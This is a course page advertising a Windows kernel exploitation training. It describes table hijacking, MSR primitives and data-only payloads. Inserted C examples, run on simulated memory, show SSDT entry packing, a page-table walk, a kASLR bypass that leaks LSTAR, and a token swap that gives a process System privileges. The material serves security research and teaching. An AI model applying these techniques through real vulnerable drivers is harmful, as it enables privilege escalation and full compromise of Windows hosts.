
Windows Kernel Exploitation [Advanced]


Regular price €600 EUR

Instructor: Juan Sacco
Juan Sacco is a security researcher and exploit developer specializing in reverse engineering, exploit development, Windows kernel exploitation, and vulnerable driver analysis. He is the founder of Exploit Pack.

[LinkedIn] · [GitHub]

Windows Kernel Exploitation: Advanced is a practical, self-paced training focused on modern Windows kernel exploit development, advanced post-exploitation techniques, data-only payloads, table hijacking, and exploitation strategies designed for hardened Windows environments.

This is a hard-core, hands-on course for students who already understand Windows kernel driver research and want to move into advanced exploit development. It is not for the faint of heart.

This training builds on the Fundamentals course and moves from driver analysis and primitive discovery into advanced exploitation workflows. Students will study how kernel read/write primitives can be transformed into practical exploit chains, how Windows kernel dispatch tables and object structures can be abused, and how modern mitigations such as PatchGuard, HVCI, VBS, kCFG, kCET, SMEP, and SMAP influence exploit design.

The course focuses on realistic Windows 11 exploitation scenarios, including IRP Table hijacking, SSDT and Shadow SSDT research, MSR-based techniques, data-only attacks, ZwMapViewOfSection-based payloads, suspended-thread execution concepts, and Data-Only Gadget techniques.

Students will use WinDbg, Ghidra, Ret-Sync, IOCTL++, custom exploit templates, vulnerable Exploit Pack drivers, and advanced kernel research tooling.

Throughout the course, you will learn how to:

  • Analyze advanced Windows kernel exploitation primitives.
  • Turn kernel read/write access into practical exploit chains.
  • Understand the difference between code-execution payloads and data-only payloads.
  • Study Windows kernel dispatch paths, including SSDT, Shadow SSDT, MSR-based dispatch, and IRP-related structures.
  • Analyze table hijacking techniques involving IDT, MSR, SSDT, Shadow SSDT, GDT, and driver-specific dispatch structures.
  • Understand why older persistent hooking techniques are fragile on modern Windows and how transient techniques differ.
  • Develop exploitation strategies that account for PatchGuard, HVCI, VBS, kCFG, kCET, SMEP, SMAP, and NX.
  • Analyze kernel objects, handle tables, access tokens, process structures, thread structures, and object metadata.
  • Use WinDbg to inspect kernel structures, processes, handles, threads, tokens, page tables, and dispatch paths.
  • Use Ghidra and Ret-Sync to connect static analysis with live kernel execution.
  • Understand physical memory, virtual memory, address translation, CR3 walking, and page-table-aware exploitation.
  • Study MSR read/write primitives and MSR-related information leaks.
  • Analyze ZwTerminateProcess-style vulnerable driver exploitation.
  • Study ZwMapViewOfSection-based payloads.
  • Understand SSDT and Shadow SSDT exploit paths.
  • Explore data-only attacks that abuse trusted kernel logic rather than injecting new kernel code.
  • Use Data-Only Gadget concepts to locate, classify, and chain useful kernel data targets at runtime.

Core Focus Areas

The Advanced training focuses on practical Windows kernel exploitation workflows built around advanced primitive usage, data-only exploitation, and dispatch-path abuse.

Data-Only Payloads

Students will learn how data-only payloads achieve their effect by modifying privileged kernel state rather than injecting or executing attacker-controlled kernel code.

The course explains why data-only techniques remain relevant on hardened systems: modern mitigations are often designed to constrain code execution, control-flow redirection, executable mappings, and persistent patching, while the kernel must still trust and consume its own data structures during normal execution.

Students will study targets such as tokens, handle state, object flags, callback-related state, policy fields, and dispatch-relevant data.

Table Hijacking and Dispatch Abuse

The course covers table hijacking as a way to transform data corruption or write primitives into controlled dispatch behavior.

Students will study IDT, MSR, SSDT, Shadow SSDT, GDT, and IRP-related structures, with emphasis on the practical differences between historical techniques, modern transient techniques, and driver-specific dispatch targets.

The training also covers why IRP and driver-specific dispatch structures are often more practical than global kernel table tampering on modern Windows systems.

MSR-Based Techniques

Students will analyze MSR read/write primitives, including how MSR exposure appears in vulnerable drivers and why MSR-related access can become a powerful primitive.

The course discusses syscall-related MSRs, MSR read information leaks, MSR table hijacking concepts, and how VBS/HVCI changes the practicality of MSR abuse on modern Windows systems.

SSDT and Shadow SSDT Exploitation

Students will study the native SSDT and Shadow SSDT as kernel dispatch surfaces.

The course explains how native system calls flow through ntoskrnl and how GUI/win32k-related system calls flow through the Shadow SSDT. Students will analyze how these paths can be studied, debugged, and used in controlled lab exploitation scenarios.
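As an added illustration of the dispatch path described above (example code written for this page, not course material): on x64 the service tables do not hold absolute function pointers. Each 32-bit entry packs a signed offset from the table base in its upper 28 bits and the count of stack-passed arguments in its low 4 bits, and the system-call number selects the table (bit 12: ntoskrnl or the win32k shadow table) and the index (bits 11:0). The table addresses, limits and entries below are constructed for the example; on a live target they come from nt!KeServiceDescriptorTable and the shadow table.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

/* Constructed service tables: addresses and entries are invented for this example. */
#define NTOS_BASE   0xFFFFF80001234000ULL   /* KiServiceTable VA (assumed) */
#define W32K_BASE   0xFFFFA1B2C3D40000ULL   /* W32pServiceTable VA (assumed) */
#define NTOS_LIMIT  0x1E0
#define W32K_LIMIT  0x500

struct service_table {
    uint64_t       base;     /* VA the packed entries are relative to */
    const int32_t *entries;  /* KiServiceTable-style 32-bit packed entries */
    uint32_t       limit;    /* number of services in the table */
};

static int32_t g_ntos_entries[NTOS_LIMIT];
static int32_t g_w32k_entries[W32K_LIMIT];
static const struct service_table g_ntos = { NTOS_BASE, g_ntos_entries, NTOS_LIMIT };
static const struct service_table g_w32k = { W32K_BASE, g_w32k_entries, W32K_LIMIT };

/* x64 packing: bits 31:4 are a signed offset from the table base, bits 3:0 the number of
 * arguments passed on the stack beyond the four register arguments. KiSystemCall64 does
 *   movsxd r11, dword ptr [r10 + rax*4] ; sar r11, 4 ; add r11, r10
 * which is exactly this decode. */
static void decode_entry(uint64_t table_base, int32_t packed, uint64_t *routine, uint32_t *stack_args)
{
    int64_t offset = (int64_t)(packed & ~0xF) / 16;   /* exact: low bits already cleared */
    *routine = table_base + (uint64_t)offset;
    *stack_args = (uint32_t)(packed & 0xF);
}

/* Inverse of decode_entry: the value an SSDT write would need so that an index dispatches
 * to `target`. Fails outside +/-128 MiB of the table, which is why an x64 SSDT entry can
 * never be pointed at user memory or at most pool allocations. */
static bool pack_entry(uint64_t table_base, uint64_t target, uint32_t stack_args, int32_t *out)
{
    int64_t delta = (int64_t)(target - table_base);
    if (stack_args > 0xF) return false;
    if (delta < -(1LL << 27) || delta >= (1LL << 27)) return false;   /* 28 signed bits */
    *out = (int32_t)(delta * 16) | (int32_t)stack_args;
    return true;
}

/* Resolve a system-call number the way KiSystemServiceStart does: bits 11:0 index the
 * table, bit 12 selects ntoskrnl (0) or the win32k shadow table (1). */
static bool resolve_syscall(uint32_t syscall_no, uint64_t *routine, uint32_t *stack_args)
{
    const struct service_table *t = (syscall_no & 0x1000) ? &g_w32k : &g_ntos;
    uint32_t index = syscall_no & 0xFFF;
    if (index >= t->limit) return false;
    decode_entry(t->base, t->entries[index], routine, stack_args);
    return true;
}

static void build_sample_tables(void)
{
    static bool built;
    if (built) return;
    built = true;
    /* Constructed routine locations relative to each table base. */
    pack_entry(NTOS_BASE, NTOS_BASE - 0x5000,  7, &g_ntos_entries[0x55]);  /* an 11-argument service */
    pack_entry(NTOS_BASE, NTOS_BASE + 0x12340, 0, &g_ntos_entries[0x18]);
    pack_entry(W32K_BASE, W32K_BASE + 0x77AB0, 2, &g_w32k_entries[3]);
}

/* Helpers for callers/tests: resolved routine (0 if out of range) and stack-arg count. */
static uint64_t routine_of(uint32_t syscall_no)
{
    uint64_t r; uint32_t n;
    build_sample_tables();
    return resolve_syscall(syscall_no, &r, &n) ? r : 0;
}
static uint32_t stack_args_of(uint32_t syscall_no)
{
    uint64_t r; uint32_t n;
    build_sample_tables();
    return resolve_syscall(syscall_no, &r, &n) ? n : UINT32_MAX;
}
static bool can_point_table_at(uint64_t target)
{
    int32_t packed;
    return pack_entry(NTOS_BASE, target, 0, &packed);
}

int main(void)
{
    const uint32_t demo[] = { 0x55, 0x18, 0x1003, 0x1FF };
    build_sample_tables();
    for (size_t i = 0; i < sizeof demo / sizeof demo[0]; i++) {
        uint64_t routine; uint32_t n;
        if (resolve_syscall(demo[i], &routine, &n))
            printf("syscall %#06x -> %#llx (%u stack args)\n", demo[i], (unsigned long long)routine, n);
        else
            printf("syscall %#06x -> out of range\n", demo[i]);
    }
    return 0;
}
```

Two practical consequences follow from the packing: an SSDT hijack on x64 can only redirect into code within 128 MiB of the table, and the shadow table is reachable only from GUI threads (the kernel switches the thread's service table on first win32k use), which is why Shadow SSDT labs first make the calling process a GUI process.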

ZwMapViewOfSection Payloads

The training includes advanced ZwMapViewOfSection-based payloads, including data-only payloads, SSDT-oriented payloads, and Shadow SSDT-oriented payloads.

Students will learn how memory mapping behavior can become part of a larger exploit strategy and how these techniques interact with modern mitigation constraints.

Data-Only Gadgets

Students will study DOG, short for Data-Only Gadgets, as a framework for using existing kernel read/write primitives to locate, classify, and chain useful kernel data targets at runtime.

The course introduces the idea of kernel gadgets as legitimate kernel code paths or data structures that can be repurposed into exploit building blocks without relying on traditional shellcode or ROP-style payloads.

Topics Included

The training covers:

  • Windows kernel architecture review
  • Windows system call flow
  • Native APIs, Nt/Zw routines, and syscall dispatch
  • SSDT and Shadow SSDT concepts
  • Process-scoped kernel breakpoints
  • Debugging native system calls with WinDbg
  • Debugging win32k / GUI system calls
  • Advanced WinDbg workflows
  • Advanced Ghidra workflows
  • Ret-Sync for static and dynamic correlation
  • Kernel objects, handle tables, and access tokens
  • EPROCESS, ETHREAD, KTHREAD, TOKEN, OBJECT_HEADER, HANDLE_TABLE, IRP, DRIVER_OBJECT, and DEVICE_OBJECT
  • Physical memory, virtual memory, and address translation
  • CR3 walking and page-table-aware exploitation
  • Superfetch and memory discovery concepts
  • Kernel read/write primitive design
  • Virtual address and physical address primitives
  • MSR read/write primitives
  • WRMSR and RDMSR exposure through vulnerable drivers
  • IOCTL++ advanced debugging workflows
  • WinDbg IOCTL plugin workflows
  • ZwTerminateProcess exploit analysis
  • Table hijacking techniques
  • IDT, MSR, SSDT, Shadow SSDT, GDT, and IRP-related dispatch structures
  • Data-only payloads
  • Token and object-state manipulation concepts
  • Callback and policy-state manipulation concepts
  • MSR read information leak exploitation
  • Suspended-thread payload concepts
  • MSR table hijacking concepts
  • ZwMapViewOfSection data-only payloads
  • ZwMapViewOfSection SSDT payloads
  • ZwMapViewOfSection Shadow SSDT payloads
  • Data-Only Gadget discovery and chaining
  • PatchGuard-aware exploit design
  • HVCI-aware exploit design
  • VBS and VTL0/VTL1 security implications
  • kASLR, NX, SMEP, SMAP, kCFG, kCET, PatchGuard, and HVCI
  • Transient modification versus persistent tampering
  • Exploit reliability, cleanup, and system stability considerations

Example Training Content

One of the advanced lessons introduces table hijacking techniques and compares IDT, MSR, SSDT, Shadow SSDT, GDT, and IRP-related structures as possible exploitation targets.

Students learn why classic global table tampering is increasingly fragile on modern Windows, why PatchGuard and HVCI change the practical value of older techniques, and why transient modifications and driver-specific dispatch structures are often more realistic in modern exploit chains.

Another lesson introduces data-only payloads and explains how an exploit can achieve privileged effects by modifying trusted kernel data instead of executing injected kernel code. The training uses this idea to connect kernel objects, tokens, handle state, callbacks, and policy fields to modern exploit design.

The final advanced section introduces Data-Only Gadget techniques, where an existing kernel read/write primitive is used to discover offsets, classify useful kernel objects, and build reusable data-oriented chains at runtime.

Course Structure

Module 1: Advanced Kernel Internals and Dispatch Paths

This module reviews the Windows kernel execution model from an exploitation perspective and focuses on the paths that connect user-mode activity to privileged kernel behavior.

Students will revisit system calls, native APIs, Nt/Zw routines, SSDT, Shadow SSDT, kernel objects, handle tables, access tokens, and the structures that become important once an exploit has a kernel read/write primitive.

Module 2: Advanced Primitive Usage and Memory Translation

This module focuses on transforming kernel read/write capabilities into stable exploitation building blocks.

Students will study virtual memory, physical memory, CR3, page-table walking, VA/PA translation, and the practical differences between virtual and physical memory primitives.
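The translation step above, as an added example (written for this page, not part of the course material): a four-level x86-64 page walk driven by a physical-read primitive. The physical memory, the page tables and the CR3 value are all constructed inline; in a real chain `read_phys()` is the vulnerable driver's physical-read IOCTL and CR3 comes from the target process's KPROCESS.DirectoryTableBase. The walk handles 2 MiB and 1 GiB large pages, reports unmapped addresses instead of faulting, and masks the PCID bits a real CR3 may carry.

```c
#include <stdint.h>
#include <stdbool.h>
#include <string.h>
#include <stdio.h>

/* Constructed "physical memory": a byte array indexed by physical address. In a real
 * chain read_phys() is the driver's physical-read primitive (e.g. an IOCTL wrapping
 * MmMapIoSpace or a view of \Device\PhysicalMemory). */
#define PHYS_SIZE (8 * 4096)
static uint8_t g_phys[PHYS_SIZE];

static bool read_phys(uint64_t pa, void *out, size_t len)
{
    if (pa > PHYS_SIZE || len > PHYS_SIZE - pa) return false;
    memcpy(out, g_phys + pa, len);
    return true;
}

static void write_phys_u64(uint64_t pa, uint64_t v) { memcpy(g_phys + pa, &v, sizeof v); }

/* x86-64 paging-structure entry bits used by the walk. */
#define PTE_PRESENT    (1ULL << 0)
#define PTE_RW         (1ULL << 1)
#define PTE_PS         (1ULL << 7)               /* large page at PDPT (1 GiB) or PD (2 MiB) */
#define PTE_ADDR_MASK  0x000FFFFFFFFFF000ULL     /* physical address bits 51:12 */
#define CR3_ADDR_MASK  PTE_ADDR_MASK             /* drops PCID / flag bits from CR3 */

/* Four-level walk PML4 -> PDPT -> PD -> PT for a 48-bit virtual address.
 * Returns false when any level is not present (the address is not mapped). */
static bool va_to_pa(uint64_t cr3, uint64_t va, uint64_t *pa_out)
{
    static const int shift[4] = { 39, 30, 21, 12 };
    uint64_t table = cr3 & CR3_ADDR_MASK;

    for (int level = 0; level < 4; level++) {
        uint64_t idx = (va >> shift[level]) & 0x1FF;   /* 9 index bits per level */
        uint64_t entry;
        if (!read_phys(table + idx * 8, &entry, sizeof entry)) return false;
        if (!(entry & PTE_PRESENT)) return false;

        /* Large page: PDPT entry (level 1) maps 1 GiB, PD entry (level 2) maps 2 MiB. */
        if ((level == 1 || level == 2) && (entry & PTE_PS)) {
            uint64_t page_mask = (1ULL << shift[level]) - 1;
            *pa_out = (entry & PTE_ADDR_MASK & ~page_mask) | (va & page_mask);
            return true;
        }
        table = entry & PTE_ADDR_MASK;   /* next table, or the 4 KiB frame after level 3 */
    }
    *pa_out = table | (va & 0xFFF);
    return true;
}

/* Constructed tables: PML4 at PA 0x1000, PDPT 0x2000, PD 0x3000, PT 0x4000.
 * Maps VA 0xFFFF800000001000 -> PA 0x5000 (4 KiB) and VA 0xFFFF800000200000 -> PA 0x200000 (2 MiB).
 * Returns a CR3 carrying a fake PCID in its low bits to show that they must be masked. */
static uint64_t build_sample_tables(void)
{
    const uint64_t pml4 = 0x1000, pdpt = 0x2000, pd = 0x3000, pt = 0x4000;
    memset(g_phys, 0, sizeof g_phys);
    write_phys_u64(pml4 + 256 * 8, pdpt | PTE_PRESENT | PTE_RW);              /* PML4[256] */
    write_phys_u64(pdpt + 0 * 8,   pd   | PTE_PRESENT | PTE_RW);              /* PDPT[0]   */
    write_phys_u64(pd   + 0 * 8,   pt   | PTE_PRESENT | PTE_RW);              /* PD[0]     */
    write_phys_u64(pt   + 1 * 8,   0x5000   | PTE_PRESENT | PTE_RW);          /* PT[1]     */
    write_phys_u64(pd   + 1 * 8,   0x200000 | PTE_PRESENT | PTE_RW | PTE_PS); /* PD[1], 2 MiB */
    return pml4 | 0x005;   /* PCID 5 in bits 11:0 */
}

/* Convenience for callers/tests: translated PA, or 0 when the VA is not mapped. */
static uint64_t translate_or_zero(uint64_t cr3, uint64_t va)
{
    uint64_t pa;
    return va_to_pa(cr3, va, &pa) ? pa : 0;
}

int main(void)
{
    uint64_t cr3 = build_sample_tables();
    const uint64_t probes[] = { 0xFFFF800000001234ULL, 0xFFFF8000002ABCDEULL, 0xFFFF800000003000ULL };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        uint64_t pa;
        if (va_to_pa(cr3, probes[i], &pa))
            printf("VA %#018llx -> PA %#llx\n", (unsigned long long)probes[i], (unsigned long long)pa);
        else
            printf("VA %#018llx -> not mapped\n", (unsigned long long)probes[i]);
    }
    return 0;
}
```

The walk is the bridge between the two primitive types the module contrasts: with only a physical read/write, every virtual target (an EPROCESS, a token, a dispatch table) must first be translated this way, and a write to the page-table entries themselves (for example clearing the NX bit on a frame) is what turns a physical primitive into a page-table-aware one.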

Module 3: MSR Primitives and Syscall-Entry Research

This module focuses on MSR-related exploitation concepts and vulnerable drivers that expose MSR read/write capabilities.

Students will study MSR read information leaks, syscall-related MSRs, WRMSR/RDMSR exposure, and the practical impact of VBS and HVCI on MSR-based techniques.
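An added example of the MSR information leak this module covers (example code written for this page, not course material): IA32_LSTAR holds the address the SYSCALL instruction jumps to, which lives inside ntoskrnl whether or not KVA shadowing has redirected it to the shadow entry stub, so a single RDMSR through a vulnerable driver defeats kASLR. The code below recovers the image base from that pointer by walking backwards page by page until it finds a valid PE header. The fake image, its base address, `rdmsr_via_driver()` and `kread()` are all constructed stand-ins for the driver's RDMSR IOCTL and arbitrary-read primitive.

```c
#include <stdint.h>
#include <stdbool.h>
#include <string.h>
#include <stdio.h>

#define MSR_LSTAR 0xC0000082u   /* IA32_LSTAR: target of the SYSCALL instruction */

/* Constructed kernel address space: a fake 16-page ntoskrnl image at an assumed base. */
#define IMAGE_BASE   0xFFFFF80012340000ULL
#define IMAGE_PAGES  16
static uint8_t g_image[IMAGE_PAGES * 0x1000];

/* Stand-in for the driver's arbitrary kernel read; fails outside the mapped image. */
static bool kread(uint64_t va, void *out, size_t len)
{
    if (va < IMAGE_BASE) return false;
    uint64_t off = va - IMAGE_BASE;
    if (off > sizeof g_image || len > sizeof g_image - off) return false;
    memcpy(out, g_image + off, len);
    return true;
}

/* Stand-in for the driver's RDMSR IOCTL: LSTAR points somewhere in page 5 of the image,
 * as KiSystemCall64 / KiSystemCall64Shadow sits somewhere inside ntoskrnl. */
static uint64_t rdmsr_via_driver(uint32_t msr)
{
    return msr == MSR_LSTAR ? IMAGE_BASE + 5 * 0x1000 + 0x3C0 : 0;
}

/* Walk backwards page by page from the leaked pointer until an "MZ" page whose
 * e_lfanew points at "PE\0\0" is found. The scan is bounded and stops on the first
 * unreadable page rather than continuing into unmapped memory. */
static uint64_t find_image_base(uint64_t leaked_ptr, uint32_t max_pages)
{
    uint64_t page = leaked_ptr & ~0xFFFULL;
    for (uint32_t i = 0; i < max_pages; i++, page -= 0x1000) {
        uint16_t mz; uint32_t e_lfanew, pe_sig;
        if (!kread(page, &mz, sizeof mz)) return 0;
        if (mz != 0x5A4D) continue;                          /* "MZ" little-endian */
        if (!kread(page + 0x3C, &e_lfanew, sizeof e_lfanew)) return 0;
        if (e_lfanew > 0x1000 - 4) continue;                 /* keep the probe in the same page */
        if (!kread(page + e_lfanew, &pe_sig, sizeof pe_sig)) return 0;
        if (pe_sig == 0x00004550) return page;               /* "PE\0\0" */
    }
    return 0;
}

/* Constructed image: a real-looking DOS/PE header in page 0 and a decoy "MZ" in page 3
 * with no PE signature behind it, to show why the e_lfanew check is needed. */
static void build_sample_image(void)
{
    static bool built;
    if (built) return;
    built = true;
    memset(g_image, 0, sizeof g_image);
    uint32_t e_lfanew = 0xF8, decoy = 0x80;
    memcpy(g_image, "MZ", 2);
    memcpy(g_image + 0x3C, &e_lfanew, sizeof e_lfanew);
    memcpy(g_image + 0xF8, "PE\0\0", 4);
    memcpy(g_image + 3 * 0x1000, "MZ", 2);
    memcpy(g_image + 3 * 0x1000 + 0x3C, &decoy, sizeof decoy);
}

/* Leak LSTAR and recover the base, scanning at most max_pages backwards. */
static uint64_t demo_bounded_scan(uint32_t max_pages)
{
    build_sample_image();
    return find_image_base(rdmsr_via_driver(MSR_LSTAR), max_pages);
}

int main(void)
{
    uint64_t lstar = (build_sample_image(), rdmsr_via_driver(MSR_LSTAR));
    printf("LSTAR = %#llx, ntoskrnl base = %#llx\n",
           (unsigned long long)lstar, (unsigned long long)demo_bounded_scan(64));
    return 0;
}
```

Reading LSTAR stays useful on VBS-enabled systems; it is the WRMSR side (repointing LSTAR at attacker code, the classic MSR hijack) that the hypervisor intercepts, which is the distinction the module draws between MSR leaks and MSR table hijacking.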

Module 4: Table Hijacking and Dispatch-State Exploitation

This module introduces advanced dispatch-path abuse and table hijacking techniques.

Students will study the historical and modern relevance of IDT, MSR, SSDT, Shadow SSDT, GDT, IRP-related structures, driver dispatch tables, completion routines, callback fields, and private operation tables.

Module 5: Data-Only Payloads and Kernel Object Manipulation

This module focuses on data-only exploitation.

Students will learn how an exploit can achieve meaningful effects by modifying trusted kernel data consumed by normal kernel code, avoiding the need for injected code or direct control-flow hijacking.
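The token manipulation that both the Data-Only Payloads section and this module describe, as an added example (written for this page, not course material): with only a kernel read/write primitive, walk ActiveProcessLinks from the System process to the target EPROCESS and point its Token field at the System token. No code is injected and nothing in the control flow changes; the kernel's own access checks consume the swapped pointer. The memory image, the three fake EPROCESS records, their field offsets and `kread64`/`kwrite64` are constructed for the example; on a real target the offsets come from symbols and the primitives from the vulnerable driver.

```c
#include <stdint.h>
#include <stdbool.h>
#include <string.h>
#include <stdio.h>

/* Constructed kernel memory with three fake EPROCESS records. The layout is an assumption
 * for this example; real offsets come from symbols (WinDbg: dt nt!_EPROCESS UniqueProcessId
 * ActiveProcessLinks Token) and kread64/kwrite64 are the driver's read/write primitives. */
#define KMEM_BASE 0xFFFFC00000000000ULL
#define KMEM_SIZE 0x4000
static uint8_t g_kmem[KMEM_SIZE];

static bool kread64(uint64_t va, uint64_t *out)
{
    if (va < KMEM_BASE || va - KMEM_BASE > KMEM_SIZE - 8) return false;
    memcpy(out, g_kmem + (va - KMEM_BASE), 8);
    return true;
}
static bool kwrite64(uint64_t va, uint64_t val)
{
    if (va < KMEM_BASE || va - KMEM_BASE > KMEM_SIZE - 8) return false;
    memcpy(g_kmem + (va - KMEM_BASE), &val, 8);
    return true;
}

#define OFF_PID    0x00   /* UniqueProcessId (assumed layout) */
#define OFF_LINKS  0x08   /* ActiveProcessLinks: LIST_ENTRY { Flink, Blink } */
#define OFF_TOKEN  0x18   /* Token: EX_FAST_REF, pointer in bits 63:4, cached refs in bits 3:0 */
#define EX_FAST_REF_MASK 0xFULL

#define SYSTEM_EPROCESS  (KMEM_BASE + 0x1000)   /* stands in for nt!PsInitialSystemProcess */
#define SVCHOST_EPROCESS (KMEM_BASE + 0x2000)
#define TARGET_EPROCESS  (KMEM_BASE + 0x3000)
#define SYSTEM_TOKEN     0xFFFF9A8000123457ULL   /* pointer ...450, fast-ref count 7 */
#define TARGET_TOKEN     0xFFFF9A80004567A3ULL   /* pointer ...7A0, fast-ref count 3 */

static void link_processes(uint64_t a, uint64_t b)   /* a.Flink = b, b.Blink = a */
{
    kwrite64(a + OFF_LINKS,     b + OFF_LINKS);
    kwrite64(b + OFF_LINKS + 8, a + OFF_LINKS);
}

static void build_sample_kernel(void)
{
    static bool built;
    if (built) return;
    built = true;
    memset(g_kmem, 0, sizeof g_kmem);
    kwrite64(SYSTEM_EPROCESS  + OFF_PID, 4);
    kwrite64(SVCHOST_EPROCESS + OFF_PID, 800);
    kwrite64(TARGET_EPROCESS  + OFF_PID, 1337);
    kwrite64(SYSTEM_EPROCESS  + OFF_TOKEN, SYSTEM_TOKEN);
    kwrite64(SVCHOST_EPROCESS + OFF_TOKEN, 0xFFFF9A8000234562ULL);
    kwrite64(TARGET_EPROCESS  + OFF_TOKEN, TARGET_TOKEN);
    link_processes(SYSTEM_EPROCESS, SVCHOST_EPROCESS);
    link_processes(SVCHOST_EPROCESS, TARGET_EPROCESS);
    link_processes(TARGET_EPROCESS, SYSTEM_EPROCESS);
}

/* Walk ActiveProcessLinks from System (CONTAINING_RECORD on each Flink) until the PID
 * matches; bounded, and stops when the circular list wraps back to System. */
static uint64_t find_eprocess(uint64_t pid)
{
    build_sample_kernel();
    uint64_t cur = SYSTEM_EPROCESS;
    for (int i = 0; i < 4096; i++) {
        uint64_t cur_pid, flink;
        if (!kread64(cur + OFF_PID, &cur_pid)) return 0;
        if (cur_pid == pid) return cur;
        if (!kread64(cur + OFF_LINKS, &flink)) return 0;
        cur = flink - OFF_LINKS;
        if (cur == SYSTEM_EPROCESS) break;
    }
    return 0;
}

static uint64_t token_of(uint64_t pid)
{
    uint64_t ep = find_eprocess(pid), tok;
    return (ep && kread64(ep + OFF_TOKEN, &tok)) ? tok : 0;
}

/* Data-only elevation: replace the pointer bits of the target's Token with the System
 * token's pointer. The low 4 bits are the EX_FAST_REF cached-reference count, not address
 * bits, so they are kept from the original value and only the pointer is swapped. */
static bool elevate_token(uint64_t target_pid, uint64_t *saved_token)
{
    uint64_t target = find_eprocess(target_pid), sys_tok;
    if (!target || !kread64(target + OFF_TOKEN, saved_token)) return false;
    if (!kread64(SYSTEM_EPROCESS + OFF_TOKEN, &sys_tok)) return false;
    uint64_t swapped = (sys_tok & ~EX_FAST_REF_MASK) | (*saved_token & EX_FAST_REF_MASK);
    return kwrite64(target + OFF_TOKEN, swapped);
}

/* Cleanup: put the original token back before the process exits, otherwise teardown
 * dereferences the System token on the target's behalf and the reference counts drift. */
static bool restore_token(uint64_t target_pid, uint64_t saved_token)
{
    uint64_t target = find_eprocess(target_pid);
    return target && kwrite64(target + OFF_TOKEN, saved_token);
}

/* Elevate, observe the swapped value, restore; returns the token seen while elevated. */
static uint64_t demo_elevate_and_restore(uint64_t target_pid)
{
    uint64_t saved;
    if (!elevate_token(target_pid, &saved)) return 0;
    uint64_t seen = token_of(target_pid);
    restore_token(target_pid, saved);
    return seen;
}

int main(void)
{
    uint64_t before = token_of(1337), during = demo_elevate_and_restore(1337);
    printf("target token before %#llx, during %#llx, after %#llx\n",
           (unsigned long long)before, (unsigned long long)during, (unsigned long long)token_of(1337));
    return 0;
}
```

The same walk-and-write pattern applies to the other targets the module lists (handle table entries, object flags, callback and policy fields): the primitive never has to execute anything, which is why PatchGuard, HVCI and kCFG constrain this far less than they constrain code injection. Restoring the original value is the reliability and cleanup step the course stresses.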

Module 6: ZwMapViewOfSection and Advanced Payload Construction

This module focuses on advanced payload construction using ZwMapViewOfSection and related dispatch paths.

Students will study how section mapping, memory views, and system-call dispatch can become part of an advanced exploit strategy.

Module 7: Data-Only Gadgets and DOG

This module introduces Data-Only Gadget techniques and DOG-based workflows.

Students will learn how existing kernel read/write primitives can be connected to runtime discovery, structure walking, offset recovery, gadget classification, and data-oriented chain construction.

Hands-On Exercises and Materials

Students will practice against controlled lab environments, vulnerable drivers, and advanced exploit templates, including:

  • Exploit Pack drivers created for the course
  • Advanced vulnerable driver samples
  • Real-world vulnerable driver case studies
  • IOCTL debugging exercises
  • MSR primitive analysis labs
  • Kernel read/write primitive labs
  • Physical memory and virtual memory labs
  • SSDT and Shadow SSDT analysis labs
  • ZwTerminateProcess exploit analysis
  • ZwMapViewOfSection payload labs
  • Table hijacking research exercises
  • Data-only payload exercises
  • DOG / Data-Only Gadget discovery exercises
  • PatchGuard-aware and HVCI-aware exploitability labs
  • WinDbg and Ghidra correlation exercises
  • Ret-Sync synchronization exercises

Tools and Takeaways

Participants will receive access to tools and materials used throughout the course, including:

  • IOCTL++
  • Exploit templates
  • Advanced vulnerable driver samples
  • WinDbg helpers
  • Ghidra scripts and plugins
  • Ret-Sync workflow material
  • Driver analysis scripts
  • Kernel read/write primitive templates
  • MSR analysis helpers
  • DOG / Data-Only Gadget material
  • Offset and structure discovery helpers
  • Lab notes and supporting documentation
  • Additional tooling for vulnerability discovery and exploit development

Schedule and Delivery

Format: Pre-recorded, self-paced training
Structure: Advanced modules with video lessons, hands-on exercises, downloadable tools, and supporting materials
Exercises: Practical labs included throughout the course
Access: Learn at your own pace and revisit the material as needed

Support and Community

Students receive access to the dedicated Discord training channel, where they can share progress, ask questions, troubleshoot labs, and collaborate with instructors and other participants.

Who This Training Is For

This training is intended for:

  • Security researchers
  • Reverse engineers
  • Exploit developers
  • Kernel vulnerability researchers
  • Malware analysts
  • Red-team operators
  • Advanced Windows internals students
  • Researchers who already understand driver debugging and want to move into advanced exploit development
  • Engineers interested in modern Windows kernel mitigation-aware exploitation

Recommended Background

Students should already be comfortable with the material covered in the Fundamentals course or have equivalent experience.

Recommended knowledge:

  • Windows kernel debugging with WinDbg
  • Basic driver internals
  • IRPs and IOCTLs
  • Ghidra or IDA-based reverse engineering
  • x64 assembly
  • C or C++ systems programming
  • Windows internals
  • Kernel objects, processes, threads, and tokens
  • Basic exploit development concepts
  • Physical memory and MSR primitives (strongly recommended)

Learning Outcomes

By the end of the training, students will be able to:

  • Analyze advanced Windows kernel exploitation primitives.
  • Understand how kernel read/write primitives can be transformed into exploit chains.
  • Reason about virtual memory, physical memory, CR3, and address translation.
  • Analyze MSR read/write exposure in vulnerable drivers.
  • Understand SSDT and Shadow SSDT dispatch paths.
  • Evaluate table hijacking techniques under modern Windows mitigations.
  • Build mitigation-aware exploitation strategies.
  • Understand data-only payloads and why they remain relevant on hardened systems.
  • Analyze token, handle, callback, object, and policy-related kernel state.
  • Understand ZwMapViewOfSection-based payload strategies.
  • Use WinDbg, Ghidra, and Ret-Sync in advanced kernel exploit workflows.
  • Use Data-Only Gadget concepts to locate and chain useful kernel data targets.
  • Evaluate the practical impact of PatchGuard, HVCI, VBS, kCFG, kCET, SMEP, SMAP, and NX.
  • Design exploit workflows that prioritize reliability, cleanup, and target-specific mitigation awareness.
